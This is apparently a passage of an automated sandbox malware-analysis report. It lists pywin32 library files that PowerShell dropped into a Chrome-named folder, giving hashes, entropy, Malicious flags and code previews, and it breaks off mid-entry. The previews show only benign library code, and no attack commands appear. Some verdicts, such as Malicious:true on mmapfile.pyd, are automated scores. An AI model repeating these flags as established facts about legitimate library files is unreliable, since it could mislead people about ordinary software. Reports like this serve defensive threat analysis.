                                                                                                                                                                                                  Preview:""".Performance Data Helper (PDH) Query Classes..Wrapper classes for end-users and high-level access to the PDH query.mechanisms. PDH is a win32-specific mechanism for accessing the.performance data made available by the system. The Python for Windows.PDH module does not implement the "Registry" interface, implementing.the more straightforward Query-based mechanism...The basic idea of a PDH Query is an object which can query the system.about the status of any number of "counters." The counters are paths.to a particular piece of performance data. For instance, the path .'\\Memory\\Available Bytes' describes just about exactly what it says.it does, the amount of free memory on the default computer expressed .in Bytes. These paths can be considerably more complex than this, .but part of the point of this wrapper module is to hide that.complexity from the end-user/programmer...EXAMPLE: A more complex Path..'\\\\RAISTLIN\\PhysicalDisk(_Total)\\Avg. Disk Bytes/Read'..Raistlin --> Comput

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\win32pdhutil.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7572
                                                                                                                                                                                                  Entropy (8bit):4.760002873265964
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:rzrV6tcGJwM6z1h5q6wq+zoDz7iHEQER6qkYdWXxQeio:rzOwv9qICqbox
                                                                                                                                                                                                  MD5:8AD62CBBD2071246ABA788230750686B
                                                                                                                                                                                                  SHA1:23BBB6B4B02A5119B2B076D0C79852F54F264A79
                                                                                                                                                                                                  SHA-256:306381F35E30A3864D0C8B7CE4A643DB6459B46A4B2ACDBDDF3F51F97236F280
                                                                                                                                                                                                  SHA-512:F3083469BCD5C3A05FB25F4D313DD9C9652FC7929AFC27E4C0CB7AD55FB1A8EB314C60300153FA3FBD1FBE3A37B4826B0FF68224F8CA5DD26BC1FBA7D966E2E5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Utilities for the win32 Performance Data Helper module..Example:. To get a single bit of data:. >>> import win32pdhutil. >>> win32pdhutil.GetPerformanceAttributes("Memory", "Available Bytes"). 6053888. >>> win32pdhutil.FindPerformanceAttributesByName("python", counter="Virtual Bytes"). [22278144].. First example returns data which is not associated with any specific instance... The second example reads data for a specific instance - hence the list return -. it would return one result for each instance of Python running... In general, it can be tricky finding exactly the "name" of the data you wish to query.. Although you can use <om win32pdh.EnumObjectItems>(None,None,(eg)"Memory", -1) to do this,. the easiest way is often to simply use PerfMon to find out the names.."""..import time..import win32pdh..error = win32pdh.error..# Handle some localization issues..# see http://support.microsoft.com/default.aspx?scid=http://support.microsoft.com:80/support/kb/articles/Q287/1/5

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\win32rcparser.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21621
                                                                                                                                                                                                  Entropy (8bit):4.345741275259594
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:14EBSW45wnsBm90TycgCgHv+gDaFWz08oQdcqlsOaCZUCrBX0+ODX5UZTQdNH6kF:14EBkbg0T1gCgHk6cqqOaeUCJZ0bH6kF
                                                                                                                                                                                                  MD5:6E9D68C5DA50B72139D96FF891CD4721
                                                                                                                                                                                                  SHA1:D062B14C6573976B48B9EE109FE1E9E25D0B49F1
                                                                                                                                                                                                  SHA-256:0800FE2913F79F7FD01B4E6ECC35890AE1E790C3B3BB822DAF5E683D783A3D25
                                                                                                                                                                                                  SHA-512:34E8525684978447423BA9E40253F1603D846E657DD4F27707BA48C7A56AAEEC0ABB9E49E9948C94EBEE7437C371E10FF8354F00C2C2E2A4B9B2BB34200EDD51
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Windows dialog .RC file parser, by Adam Walker...# This module was adapted from the spambayes project, and is Copyright.# 2003/2004 The Python Software Foundation and is covered by the Python.# Software Foundation license..""".This is a parser for Windows .rc files, which are text files which define.dialogs and other Windows UI resources..""".__author__ = "Adam Walker".__version__ = "0.11"..import os.import pprint.import shlex.import stat.import sys..import commctrl.import win32con.._controlMap = {. "DEFPUSHBUTTON": 0x80,. "PUSHBUTTON": 0x80,. "Button": 0x80,. "GROUPBOX": 0x80,. "Static": 0x82,. "CTEXT": 0x82,. "RTEXT": 0x82,. "LTEXT": 0x82,. "LISTBOX": 0x83,. "SCROLLBAR": 0x84,. "COMBOBOX": 0x85,. "EDITTEXT": 0x81,. "ICON": 0x82,. "RICHEDIT": "RichEdit20A",.}..# These are "default styles" for certain controls - ie, Visual Studio assumes.# the styles will be applied, and emits a "NOT {STYLE_NAME}" if it is to be.# disabled. These defaults ha

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\win32serviceutil.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script text executable Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):37862
                                                                                                                                                                                                  Entropy (8bit):4.614779913776034
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:AO8FXlkGUR9NrtkfDzwVfA4wLI9w+M8M/ZwX6x+czhipBbfwT9aFFep:AO6bI9NrQI9VMn/ZwX6x+czMpBbfi
                                                                                                                                                                                                  MD5:A2763C3261E20DD075A58806FC70F5D6
                                                                                                                                                                                                  SHA1:EAA742D5CF6A52C4FF73FE918576BC833B5773F4
                                                                                                                                                                                                  SHA-256:5AEC1FB03072ADA28FB7E6A481BAB681EF86D6A8B5655D42EC2025480D192629
                                                                                                                                                                                                  SHA-512:4C721D6130027E5EBE64A8DADA7694B3351C43468DD14401290073D3B28FBA0E4538FD8BE94C9A92593AD32E47E995BB642AEE4D28019EDC1D4C81ADEEAF04AA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# General purpose service utilities, both for standard Python scripts,.# and for for Python programs which run as services....#.# Note that most utility functions here will raise win32api.error's.# (which is win32service.error, pywintypes.error, etc).# when things go wrong - eg, not enough permissions to hit the.# registry etc...import importlib.import os.import sys.import warnings..import pywintypes.import win32api.import win32con.import win32service.import winerror.._d = "_d" if "_d.pyd" in importlib.machinery.EXTENSION_SUFFIXES else "".error = RuntimeError...# Returns the full path to an executable for hosting a Python service - typically.# 'pythonservice.exe'.# * If you pass a param and it exists as a file, you'll get the abs path back.# * Otherwise we'll use the param instead of 'pythonservice.exe', and we will.# look for it..def LocatePythonServiceExe(exe=None):. if not exe and hasattr(sys, "frozen"):. # If py2exe etc calls this with no exe, default is current exe,.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\win32timezone.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):34707
                                                                                                                                                                                                  Entropy (8bit):4.807361610549798
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:tPJIPrdvdG2k1yjOW8/S8qwAKUQM/pSfWk9D:tPJIBk15W8/SzaWk9D
                                                                                                                                                                                                  MD5:718FFB8E2DE16CC50F85AE5A97357C1E
                                                                                                                                                                                                  SHA1:0C525852741BB3C79217BB8BE74B70BF961BA6CE
                                                                                                                                                                                                  SHA-256:0B841E5261A6631A779AADC686380CD950687BCFCA5DEBB3811F1239B0D46215
                                                                                                                                                                                                  SHA-512:0649B8EAF331CD2A8E126614CF2C3F4C19659E0E18710AB945CD118D257F11FAF10745CACC477CA684576D27FB32D6ABE850645483E970BDA9A87ABFF3BA968B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: UTF-8 -*-..""".win32timezone:. Module for handling datetime.tzinfo time zones using the windows.registry for time zone information. The time zone names are dependent.on the registry entries defined by the operating system... This module may be tested using the doctest module... Written by Jason R. Coombs (jaraco@jaraco.com).. Copyright . 2003-2012.. All Rights Reserved... This module is licenced for use in Mark Hammond's pywin32.library under the same terms as the pywin32 library... To use this time zone module with the datetime module, simply pass.the TimeZoneInfo object to the datetime constructor. For example,..>>> import win32timezone, datetime.>>> assert 'Mountain Standard Time' in win32timezone.TimeZoneInfo.get_sorted_time_zone_names().>>> MST = win32timezone.TimeZoneInfo('Mountain Standard Time').>>> now = datetime.datetime.now(MST).. The now object is now a time-zone aware object, and daylight savings-.aware methods may be called on it..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\win32traceutil.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1584
                                                                                                                                                                                                  Entropy (8bit):4.654992084520462
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:aNWT3mYj2PxhrzR5jhWEhEJA755kzfs8R6tTw6mrHcBkAV6vbdw:oWbUh3R55Eqk1CTw6pXVAy
                                                                                                                                                                                                  MD5:BDFB78DE5F5D6078A8BD64C4F657E8C7
                                                                                                                                                                                                  SHA1:866AA96F01D696B9C372CD553DD450D757675E6B
                                                                                                                                                                                                  SHA-256:0F10F3808D3A2A2913D6AD0F2FE7533CE0FA97C9DD9B076ECDA74746D3B14A61
                                                                                                                                                                                                  SHA-512:B4E95B9891C3A466A1F06587C850AE26F4E15F4FBA238AB384217F239AAFD4F6E628B120343271C794B8E15EAE0E90864ADE9540DB0E82CA3176BA2B12F78F4E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# This is a helper for the win32trace module..# If imported from a normal Python program, it sets up sys.stdout and sys.stderr.# so output goes to the collector...# If run from the command line, it creates a collector loop...# Eg:.# C:>start win32traceutil.py (or python.exe win32traceutil.py).# will start a process with a (pretty much) blank screen..#.# then, switch to a DOS prompt, and type:.# C:>python.exe.# Python 1.4 etc....# >>> import win32traceutil.# Redirecting output to win32trace remote collector.# >>> print "Hello".# >>>.# And the output will appear in the first collector process...# Note - the client or the collector can be started first..# There is a 0x20000 byte buffer. If this gets full, it is reset, and new.# output appended from the start...import win32trace...def RunAsCollector():. import sys.. try:. import win32api.. win32api.SetConsoleTitle("Python Trace Collector"). except:. pass # Oh well!. win32trace.InitRead(). print("Collec

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\win32verstamp.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7181
                                                                                                                                                                                                  Entropy (8bit):4.8562430886724055
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:2iXBeK46B+reiXzazgvCzzLGz/cqXsvAzSKSi+0NYBQL2wTekW6FRJVt6fgvokMH:2iXB3Lzw9WMRJ9Q3
                                                                                                                                                                                                  MD5:7388BE0EC0F22D309FD05084BEA46732
                                                                                                                                                                                                  SHA1:C1344C0077A437F903090F9ACEFD4D023490F2E6
                                                                                                                                                                                                  SHA-256:59028FB43A41D5F1A37425AA91ECE10D9A3336494E9FC12A85456213EC157524
                                                                                                                                                                                                  SHA-512:542855F86F989D8DC7EA2F9F5B56BB2D2DC9E137B14AFC79387AA7B16CDA7C213FBBDE125E1C2F81FFCDBCCCCD19DD009DB3D6F0D9F8C531CD5EF32E5249CDD9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Stamp a Win32 binary with version information.."""..import glob.import optparse.import os.import struct.import sys..from win32api import BeginUpdateResource, EndUpdateResource, UpdateResource..VS_FFI_SIGNATURE = -17890115 # 0xFEEF04BD.VS_FFI_STRUCVERSION = 0x00010000.VS_FFI_FILEFLAGSMASK = 0x0000003F.VOS_NT_WINDOWS32 = 0x00040004..null_byte = "\0".encode("ascii") # str in py2k, bytes in py3k...#.# Set VS_FF_PRERELEASE and DEBUG if Debug.#.def file_flags(debug):. if debug:. return 3 # VS_FF_DEBUG | VS_FF_PRERELEASE. return 0...def file_type(is_dll):. if is_dll:. return 2 # VFT_DLL. return 1 # VFT_APP...def VS_FIXEDFILEINFO(maj, min, sub, build, debug=0, is_dll=1):. return struct.pack(. "lllllllllllll",. VS_FFI_SIGNATURE, # dwSignature. VS_FFI_STRUCVERSION, # dwStrucVersion. (maj << 16) | min, # dwFileVersionMS. (sub << 16) | build, # dwFileVersionLS. (maj << 16) | min, # dwProductVersionMS. (sub

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\winerror.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):101476
                                                                                                                                                                                                  Entropy (8bit):4.77819887256081
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:4t1wPaKFhrJ8Z4URAd4X918GSpoJVIgF4QNAOeETca2AU/bZVQOtdIiFns00yP8X:o0P7Y9uNpcVIgF4KRq9FwO8ELE0g1OC
                                                                                                                                                                                                  MD5:3E6BCC747E8DBB2605E4F71B359F574A
                                                                                                                                                                                                  SHA1:00FCA4E9E1878BC43471E61D37829FA8B1B7E419
                                                                                                                                                                                                  SHA-256:BDEFDD1C793B377C8712924EC2E9DC1DD36CF4D0231C42A0754F4800C4C33CE4
                                                                                                                                                                                                  SHA-512:D4AB8EE26C86C517118C58542B559233B43C68E3860580B65662BC403FD2048827B67038DA536F49EDC5A09880988914A6EA6B7EB50509F74278FA072173842B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Error related constants for win32..Generated by h2py from winerror.h.""".# Few extras added manually....TRUST_E_PROVIDER_UNKNOWN = -2146762751.TRUST_E_ACTION_UNKNOWN = -2146762750.TRUST_E_SUBJECT_FORM_UNKNOWN = -2146762749.TRUST_E_SUBJECT_NOT_TRUSTED = -2146762748.# up to here.....FACILITY_WINRM = 51.FACILITY_WINDOWSUPDATE = 36.FACILITY_WINDOWS_DEFENDER = 80.FACILITY_WINDOWS_CE = 24.FACILITY_WINDOWS = 8.FACILITY_URT = 19.FACILITY_UMI = 22.FACILITY_TPM_SOFTWARE = 41.FACILITY_TPM_SERVICES = 40.FACILITY_SXS = 23.FACILITY_STORAGE = 3.FACILITY_STATE_MANAGEMENT = 34.FACILITY_SSPI = 9.FACILITY_SCARD = 16.FACILITY_SHELL = 39.FACILITY_SETUPAPI = 15.FACILITY_SECURITY = 9.FACILITY_RPC = 1.FACILITY_PLA = 48.FACILITY_WIN32 = 7.FACILITY_CONTROL = 10.FACILITY_NULL = 0.FACILITY_NDIS = 52.FACILITY_METADIRECTORY = 35.FACILITY_MSMQ = 14.FACILITY_MEDIASERVER = 13.FACILITY_INTERNET = 12.FACILITY_ITF = 4.FACILITY_USERMODE_HYPERVISOR = 53.FACILITY_HTTP = 25.FACILITY_GRAPHICS = 38.FACILITY_FWP = 50.FACILIT

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\winioctlcon.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):35375
                                                                                                                                                                                                  Entropy (8bit):4.947059805776436
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:q3w3vnh68AVm2oVvU7O/0iFvQW3mSnvmlqqoKzl306El/Bs:qIvn5GOYiFj0qyu6Ec
                                                                                                                                                                                                  MD5:3DF6D6E817826DB59BC39A28767FBF17
                                                                                                                                                                                                  SHA1:C4A306CFBDE9C4A7AA9D6EC31A7F5DF460AF3712
                                                                                                                                                                                                  SHA-256:96315AD778ABB36647DFA50E972327BF3CE302E406BA82A0BBCB1468F0B0B724
                                                                                                                                                                                                  SHA-512:62AF06B18236700DE5F72170E98C689D66DEBA7DC782C2E3BFBBF39DF3CC2249F14DD5A69D3A1BC68CB27C17A5DE2234BA09EB5F5FA19A77E7DECC736490D3D6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:## flags, enums, guids used with DeviceIoControl from WinIoCtl.h..import pywintypes.from ntsecuritycon import FILE_READ_DATA, FILE_WRITE_DATA...def CTL_CODE(DeviceType, Function, Method, Access):. return (DeviceType << 16) | (Access << 14) | (Function << 2) | Method...def DEVICE_TYPE_FROM_CTL_CODE(ctrlCode):. return (ctrlCode & 0xFFFF0000) >> 16...FILE_DEVICE_BEEP = 0x00000001.FILE_DEVICE_CD_ROM = 0x00000002.FILE_DEVICE_CD_ROM_FILE_SYSTEM = 0x00000003.FILE_DEVICE_CONTROLLER = 0x00000004.FILE_DEVICE_DATALINK = 0x00000005.FILE_DEVICE_DFS = 0x00000006.FILE_DEVICE_DISK = 0x00000007.FILE_DEVICE_DISK_FILE_SYSTEM = 0x00000008.FILE_DEVICE_FILE_SYSTEM = 0x00000009.FILE_DEVICE_INPORT_PORT = 0x0000000A.FILE_DEVICE_KEYBOARD = 0x0000000B.FILE_DEVICE_MAILSLOT = 0x0000000C.FILE_DEVICE_MIDI_IN = 0x0000000D.FILE_DEVICE_MIDI_OUT = 0x0000000E.FILE_DEVICE_MOUSE = 0x0000000F.FILE_DEVICE_MULTI_UNC_PROVIDER = 0x00000010.FILE_DEVICE_NAMED_PIPE = 0x00000011.FILE_DEVICE_NETWORK = 0x00000012.FILE_DEVICE_NE

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\winnt.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):37443
                                                                                                                                                                                                  Entropy (8bit):5.062040837597238
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:M1R3blbtAU2MXle367ilbqqHGDyACQINpB1NzGU9z+c1m/XcSe:yoMXl/iRqoGI9z+cMcSe
                                                                                                                                                                                                  MD5:B1462067D46C806885EDDCE722EC69E4
                                                                                                                                                                                                  SHA1:7F604203D100378E7AE54333B44CA4163A527D5E
                                                                                                                                                                                                  SHA-256:F2A893A055E72F1A21474A2D0AF2847874D241DCC6EE2F11F0213CA89F2B3328
                                                                                                                                                                                                  SHA-512:5FA6A9004AA50EDB8081AB33048D03E905DAB785946830F22E0F3472D45728C54B5879F859E4040766CADB784BE5EC89CEF80D4E0F9B59FE21C3CA38494EF81C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Generated by h2py from \mssdk\include\winnt.h..APPLICATION_ERROR_MASK = 536870912.ERROR_SEVERITY_SUCCESS = 0.ERROR_SEVERITY_INFORMATIONAL = 1073741824.ERROR_SEVERITY_WARNING = -2147483648.ERROR_SEVERITY_ERROR = -1073741824.MINCHAR = 128.MAXCHAR = 127.MINSHORT = 32768.MAXSHORT = 32767.MINLONG = -2147483648.MAXLONG = 2147483647.MAXBYTE = 255.MAXWORD = 65535.MAXDWORD = -1.LANG_NEUTRAL = 0.LANG_AFRIKAANS = 54.LANG_ALBANIAN = 28.LANG_ARABIC = 1.LANG_BASQUE = 45.LANG_BELARUSIAN = 35.LANG_BULGARIAN = 2.LANG_CATALAN = 3.LANG_CHINESE = 4.LANG_CROATIAN = 26.LANG_CZECH = 5.LANG_DANISH = 6.LANG_DUTCH = 19.LANG_ENGLISH = 9.LANG_ESTONIAN = 37.LANG_FAEROESE = 56.LANG_FARSI = 41.LANG_FINNISH = 11.LANG_FRENCH = 12.LANG_GERMAN = 7.LANG_GREEK = 8.LANG_HEBREW = 13.LANG_HINDI = 57.LANG_HUNGARIAN = 14.LANG_ICELANDIC = 15.LANG_INDONESIAN = 33.LANG_ITALIAN = 16.LANG_JAPANESE = 17.LANG_KOREAN = 18.LANG_LATVIAN = 38.LANG_LITHUANIAN = 39.LANG_MACEDONIAN = 47.LANG_MALAY = 62.LANG_NORWEGIAN = 20.LANG_POLISH = 21

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\winperf.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5911
                                                                                                                                                                                                  Entropy (8bit):4.465756105097943
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:7PZRsJXrfE8ya78yd8ysr8yH78ywZSRhORN6y/o8yJ078Tm6Pt1R7ny+7nTS1pQJ:lRsJrfEG7BYrD7tM0q7W7x7ka1+YSwSm
                                                                                                                                                                                                  MD5:00BBE05FD99166836678F90A9911A478
                                                                                                                                                                                                  SHA1:EF0A2B4DC2AC55643E7F2326942612586D653F46
                                                                                                                                                                                                  SHA-256:A787E682F6200CF1F0DCCBD48E90F758B969C95DBFEB5430651AC41E1658FE06
                                                                                                                                                                                                  SHA-512:6ED6367F7C02805991E56F2BEB88928A9A34EB02ABBFA4E6C4AB189F516CC053C9C740B9C1D8C0B828E4574924141888A66AB46DFF7399869F19525325E837ED
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Generated by h2py from winperf.h.PERF_DATA_VERSION = 1.PERF_DATA_REVISION = 1.PERF_NO_INSTANCES = -1.PERF_SIZE_DWORD = 0x00000000.PERF_SIZE_LARGE = 0x00000100.PERF_SIZE_ZERO = 0x00000200.PERF_SIZE_VARIABLE_LEN = 0x00000300.PERF_TYPE_NUMBER = 0x00000000.PERF_TYPE_COUNTER = 0x00000400.PERF_TYPE_TEXT = 0x00000800.PERF_TYPE_ZERO = 0x00000C00.PERF_NUMBER_HEX = 0x00000000.PERF_NUMBER_DECIMAL = 0x00010000.PERF_NUMBER_DEC_1000 = 0x00020000.PERF_COUNTER_VALUE = 0x00000000.PERF_COUNTER_RATE = 0x00010000.PERF_COUNTER_FRACTION = 0x00020000.PERF_COUNTER_BASE = 0x00030000.PERF_COUNTER_ELAPSED = 0x00040000.PERF_COUNTER_QUEUELEN = 0x00050000.PERF_COUNTER_HISTOGRAM = 0x00060000.PERF_TEXT_UNICODE = 0x00000000.PERF_TEXT_ASCII = 0x00010000.PERF_TIMER_TICK = 0x00000000.PERF_TIMER_100NS = 0x00100000.PERF_OBJECT_TIMER = 0x00200000.PERF_DELTA_COUNTER = 0x00400000.PERF_DELTA_BASE = 0x00800000.PERF_INVERSE_COUNTER = 0x01000000.PERF_MULTI_COUNTER = 0x02000000.PERF_DISPLAY_NO_SUFFIX = 0x00000000.PERF_DISPLAY_PE

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\winxptheme.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):254
                                                                                                                                                                                                  Entropy (8bit):4.614942657274806
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:svKVMrg55fqwkAsQPlRGGR0khyRCuXp3FxXFZF/+/z5GEH0LJln:iKV3v7zN1R0khykuZnhW/MEHyJl
                                                                                                                                                                                                  MD5:AFA2616539DD48A88AA2E7071342A977
                                                                                                                                                                                                  SHA1:B54B743581965E75D2AC912AD4AC450E0C3164D4
                                                                                                                                                                                                  SHA-256:11B834A54993AE29F7334391BDF7B05F3731A99180D4B376D0ED0ABB3E07B8DF
                                                                                                                                                                                                  SHA-512:93E9916B9729ECED9ED6409945BD7E39BA644EFB08C3D21674ECB55D316EABE3AA025E1384BA3D05722F123A99A4A155E612377E3F66376FCABAE66AEF56E4DA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""A useful wrapper around the "_winxptheme" module...Originally used when we couldn't be sure Windows XP apis were going to.be available. In 2022, it's safe to assume they are, so this is just a wrapper.around _winxptheme..""".from _winxptheme import *.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\libs\pywintypes.lib

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:current ar archive
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):105046
                                                                                                                                                                                                  Entropy (8bit):5.468277487512252
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:Yo1NEllyTdHG0maB6OHP78QiCTWsAO+GmBM:5TdHF6S8Ab+G
                                                                                                                                                                                                  MD5:19F6BCA56A9CF416E09E06C744F0C0E7
                                                                                                                                                                                                  SHA1:352E73AF0A6662D367BDCC203132E5CA32BECD30
                                                                                                                                                                                                  SHA-256:BE8CEACBE3565722C61FB025EF609A5CDC732EEC4448653F5B4107DF1F1487DF
                                                                                                                                                                                                  SHA-512:23D00A61EDF83C115BEF7B014B02309BD0174A802BEAA6CBAB80D8F876198D64AED693D6E6752145D3E231869FE4E77D01EDB6CC4B4B5DB3B91003B69985DDAB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:!<arch>./ -1 0 29986 `....O...T.....................*$.......b..t...t....X...X.........0...0..,:..,:..,...,...1...1....................J...J...........h...h...z...z...........P...P........................... ... ...X...X..................-x..-x..(v..(v..$...$...?...?...:...:...........m...m....B...B...........................$...$...r...r........................................................................$...$.......................#...#....f...f...........<...<...................8...8...........H...H...................@...@...................Z...Z...........................................6...6...f...&..~...+...X~..X~..B&..B&...@...@..................u^..u^..........."..."...&...&.........@...@..zr..zr..........{...{...........y...y....,...........6...6..R...R...ZH..ZH..D...D...u...u...........t@..t@..........s...s....|...|...................X...X...........................................p...p...........D...D..........{...{.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\mmapfile.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17920
                                                                                                                                                                                                  Entropy (8bit):5.822660648618855
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:Q+UL/q4Cs1L32Dk3J3zfXf/PULQjduSzulBAaAdCqeiJOU+:Cqk73J3zfXfLugcGEzLU+
                                                                                                                                                                                                  MD5:2A754EF14BB6BDEE5D63F4827581F586
                                                                                                                                                                                                  SHA1:A106AC33A6FAD450C7179FD0A2EA34E7E87E9242
                                                                                                                                                                                                  SHA-256:AAD5E5A3180A66E9B594E9B6854241F91C58D2218D7ED4FFEAAEA3FD171D98D4
                                                                                                                                                                                                  SHA-512:B97899051064FF95540F3C7728BE8939CE08B8845726E9A4600387A5DC2A9C5D62FCE345C98744696DA80148F4DFB2BBEFD06B142275E615202F892FC7BC6DF5
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........H...)p..)p..)p..Q...)p.\q..)p..Bq..)p.\u..)p.\t..)p.\s..)p.4\q..)p.R@q..)p..)q.)p.4\y..)p.4\p..)p.4\r..)p.Rich.)p.........................PE..L......d...........!....."... ......u!.......@............................................@..........................I..P....I..x....p..\.......................D....D..T............................D..@............@..$............................text....!.......".................. ..`.rdata.......@.......&..............@..@.data........`.......8..............@....rsrc...\....p.......<..............@..@.reloc..D............@..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\odbc.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):34304
                                                                                                                                                                                                  Entropy (8bit):6.0706493448180305
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:K/m+OllJEdSFcReeELPXFriF5pERpxx2HvLD:qm+OVeExuF5pERpxUL
                                                                                                                                                                                                  MD5:F816A7D3E94862696A44B6369DFB2EA9
                                                                                                                                                                                                  SHA1:8852284DC02612F83AA4066564F16D803CF9749B
                                                                                                                                                                                                  SHA-256:00F11A5A963F930A263D866A2B6414B3835A51E9C3EC91AAD0668B9E14BF50E6
